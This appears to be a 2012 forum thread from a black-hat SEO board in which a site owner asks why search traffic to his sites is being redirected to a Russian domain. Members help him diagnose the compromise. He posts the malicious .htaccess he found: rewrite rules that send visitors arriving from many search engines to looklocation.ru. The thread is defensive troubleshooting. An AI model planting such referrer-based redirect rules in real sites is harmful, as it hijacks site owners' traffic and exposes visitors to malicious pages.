1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

WTF all traffic from G gets redirected??

Discussion in 'Black Hat SEO' started by supahsmooth, Jan 24, 2012.

  1. supahsmooth

    supahsmooth Junior Member

    Joined:
    Oct 8, 2010
    Messages:
    135
    Likes Received:
    58
    Location:
    NL
    Hi guys, I kind of badly need your help.

    Here is my problem:
    I run a site called asusrecovery.com. Pulling lots of traffice from G. I think my site got hijacked by the russian mob or something :p, because if you click on a google result of my site you get redirected to http://looklocation.ru/vis/index.php which doesn't make sense. I think somebody is trying to steal my traffic.

    You can try it by searching for "asus recovery" and click my website.

    Please please help me because it is my only source of income. I will explain my method if somebody helps ;)

    Thanks in advance!
     
  2. nikao

    nikao Power Member

    Joined:
    Oct 14, 2011
    Messages:
    518
    Likes Received:
    180
    Home Page:
    it's not just from google, I get redirected to it when im typing it in as well..
    did you check your .htaccess file? perhaps the vdomain settings in apache? dns servers?
     
    • Thanks Thanks x 1
  3. supahsmooth

    supahsmooth Junior Member

    Joined:
    Oct 8, 2010
    Messages:
    135
    Likes Received:
    58
    Location:
    NL
    Thanks for your reply!

    There is not a single trace in the .htaccess files. The wierd thing is that I can still access my host and all my wordpress installations. Do you think it is hacked?
     
  4. DamageX

    DamageX Elite Member

    Joined:
    Sep 17, 2008
    Messages:
    2,692
    Likes Received:
    1,687
    Occupation:
    Unemployable
    Location:
    Former nomad
    Thou hath been fucked.

    Submit a support ticket and notify your host of this, they should be able to find the hole and patch it.

    Oh and if you're on a shared server, it's not excluded that they gained access to your site(s) by hacking someone else's account. So the whole server may be compromised.
     
    • Thanks Thanks x 2
  5. innozemec

    innozemec Jr. VIP Jr. VIP

    Joined:
    Aug 19, 2011
    Messages:
    5,287
    Likes Received:
    1,799
    Location:
    www.Indexification.com
    Home Page:
    probably you got your WP injected with some malware thats adding redirect to that site.. check your site's output source code for suspicious code
     
    • Thanks Thanks x 1
  6. DamageX

    DamageX Elite Member

    Joined:
    Sep 17, 2008
    Messages:
    2,692
    Likes Received:
    1,687
    Occupation:
    Unemployable
    Location:
    Former nomad
    I checked that for him, first thing I did. Found no iframe or suspicious js.
     
    • Thanks Thanks x 1
  7. paulcarter97

    paulcarter97 Regular Member

    Joined:
    Nov 27, 2011
    Messages:
    392
    Likes Received:
    37
    Probably someone messing up with your site. Change your .htaccess (it is hidden) to the original copy of wordpress.
     
  8. supahsmooth

    supahsmooth Junior Member

    Joined:
    Oct 8, 2010
    Messages:
    135
    Likes Received:
    58
    Location:
    NL
    Thanks so much for all the replies BHW rocks!

    I am contacting HG support now and I will share the results. I am on a shared server so it is possible.

    I also noticed that all my websites have the same problem (about 40), so it is probably not the WP malware injection as some of my sites are raw html.
     
  9. dayomoto

    dayomoto Junior Member

    Joined:
    Jul 12, 2008
    Messages:
    193
    Likes Received:
    38
    Occupation:
    Balling
    Location:
    U.K
    your site loads fine for me
     
  10. supahsmooth

    supahsmooth Junior Member

    Joined:
    Oct 8, 2010
    Messages:
    135
    Likes Received:
    58
    Location:
    NL
    The problem is only occuring when you visit asusrecovery.com via G**gle by searching "asus recovery" (#2 in the results I think)
     
  11. _Biju_

    _Biju_ Junior Member

    Joined:
    Nov 18, 2010
    Messages:
    171
    Likes Received:
    67
    Location:
    Here
    Home Page:
    it's clearly a "virus" or code injection or whatever it's called. Search for "eval" comamnd in your php files. I can take a look if you want me to but it's usualy in your active theme folder if your using wordpress, and usualy at the bottom of the file
     
    • Thanks Thanks x 1
  12. supahsmooth

    supahsmooth Junior Member

    Joined:
    Oct 8, 2010
    Messages:
    135
    Likes Received:
    58
    Location:
    NL
    Found the problem thanks to you guys! It is a .htaccess file in the root of my host. It does mean that the host is compromised.

    Code:
    <IfModule mod_rewrite.c>
    
    RewriteEngine On	
    
    RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|baidu|youtube|wikipedia|qq|excite|altavista|msn|netscape|aol|hotbot|goto|infoseek|mamma|alltheweb|lycos|search|metacrawler|bing|dogpile|facebook|twitter|blog|live|myspace|mail|yandex|rambler|ya|aport|linkedin|flickr|nigma|liveinternet|vkontakte|webalta|filesearch|yell|openstat|metabot|nol9|zoneru|km|gigablast|entireweb|amfibi|dmoz|yippy|search|walhello|webcrawler|jayde|findwhat|teoma|euroseek|wisenut|about|thunderstone|ixquick|terra|lookle|metaeureka|searchspot|slider|topseven|allthesites|libero|clickey|galaxy|brainysearch|pocketflier|verygoodsearch|bellnet|freenet|fireball|flemiro|suchbot|acoon|cyber-content|devaro|fastbot|netzindex|abacho|allesklar|suchnase|schnellsuche|sharelook|sucharchiv|suchbiene|suchmaschine|web-archiv)\.(.*)
    
    RewriteRule ^(.*)$ http://looklocation.ru/vis/index.php [R=301,L]
    
    RewriteCond %{HTTP_REFERER} ^.*(web|websuche|witch|wolong|oekoportal|t-online|freenet|arcor|alexana|tiscali|kataweb|orange|voila|sfr|startpagina|kpnvandaag|ilse|wanadoo|telfort|hispavista|passagen|spray|eniro|telia|bluewin|sympatico|nlsearch|atsearch|klammeraffe|sharelook|suchknecht|ebay|abizdirectory|alltheuk|bhanvad|daffodil|click4choice|exalead|findelio|gasta|gimpsy|globalsearchdirectory|hotfrog|jobrapido|kingdomseek|mojeek|searchers|simplyhired|splut|the-arena|thisisouryear|ukkey|uwe|friendsreunited|jaan|qp|rtl|search-belgium|apollo7|bricabrac|findloo|kobala|limier|express|bestireland|browseireland|finditireland|iesearch|ireland-information|kompass|startsiden|confex|finnalle|gulesider|keyweb|finnfirma|kvasir|savio|sol|startsiden|allpages|america|botw|chapu|claymont|clickz|clush|ehow|findhow|icq|goo|westaustraliaonline)\.(.*)
    
    RewriteRule ^(.*)$ http://looklocation.ru/vis/index.php [R=301,L]
    
    </IfModule>
    I contaced support and they are goiing to fix the hole.

    Thanks for the support!
     
  13. wanfirdaus

    wanfirdaus Regular Member

    Joined:
    Dec 6, 2010
    Messages:
    357
    Likes Received:
    132
    Occupation:
    IM
    Location:
    WP Login
    Home Page:
  14. capripio

    capripio Regular Member

    Joined:
    Dec 25, 2010
    Messages:
    248
    Likes Received:
    157
    Occupation:
    Programmer
    Location:
    127.0.0.1
    Dude Remove this file and your problem get solved !
     
  15. supahsmooth

    supahsmooth Junior Member

    Joined:
    Oct 8, 2010
    Messages:
    135
    Likes Received:
    58
    Location:
    NL
    Yes I know. I had to leave it as is so that the technical people of HG could trace te hole and fix it ;). Thanks for the heads up tough.

     
  16. DamageX

    DamageX Elite Member

    Joined:
    Sep 17, 2008
    Messages:
    2,692
    Likes Received:
    1,687
    Occupation:
    Unemployable
    Location:
    Former nomad
    Problem is... If you're on a shared server then it rarely matters if YOU keep your scripts up-to-date and secured. There's always some other guy on the server who forgets updating his.
     
    • Thanks Thanks x 1
  17. gmsniperx

    gmsniperx Jr. VIP Jr. VIP

    Joined:
    Oct 17, 2011
    Messages:
    137
    Likes Received:
    609
    I am also having the same problem!

    .htaccess file on my domains also look like this, but the redirection is towards h++p://look-location.ru/vis/index.php

    I have asked my hosting provider to look into the matter,

    Can someone help me out please,
     
  18. orlandolongwood

    orlandolongwood Junior Member

    Joined:
    Aug 16, 2009
    Messages:
    137
    Likes Received:
    85
    Occupation:
    failed novelist
    Location:
    Austin, TX
    Friends,

    First, lets all move our shared hosting sites to companies that take security seriously. I vote for HostGator because they do; also a senior support tech is my next-door neighbor and I have a can of air horn and am not afraid to use it at 3 AM.

    Next, lets all secure our hosting environment AND our .htaccess file. CHMOD 644, thank you.

    Your password needs to be in Swahili, Latin, or Middle English. Fix it now.

    Finally, implement a script similar to:

    Code:
    http://www.premierwebsitesolutions.com/scripts/monitor/PWSmonitorchanges.txt
    Don't know how to do this? Get on Craigslist and find a local (within driving distance) resource that knows this.
     
  19. nipunn12

    nipunn12 Regular Member

    Joined:
    May 30, 2011
    Messages:
    372
    Likes Received:
    98
    Its fixed now. Checked from google.ae
     
  20. supahsmooth

    supahsmooth Junior Member

    Joined:
    Oct 8, 2010
    Messages:
    135
    Likes Received:
    58
    Location:
    NL
    Small update. HG staff fixed it right away. It took them about 4 hours from my notification untill solving the problem. So that is quite quick. They say it was cause by an outdated version of timthumb.php.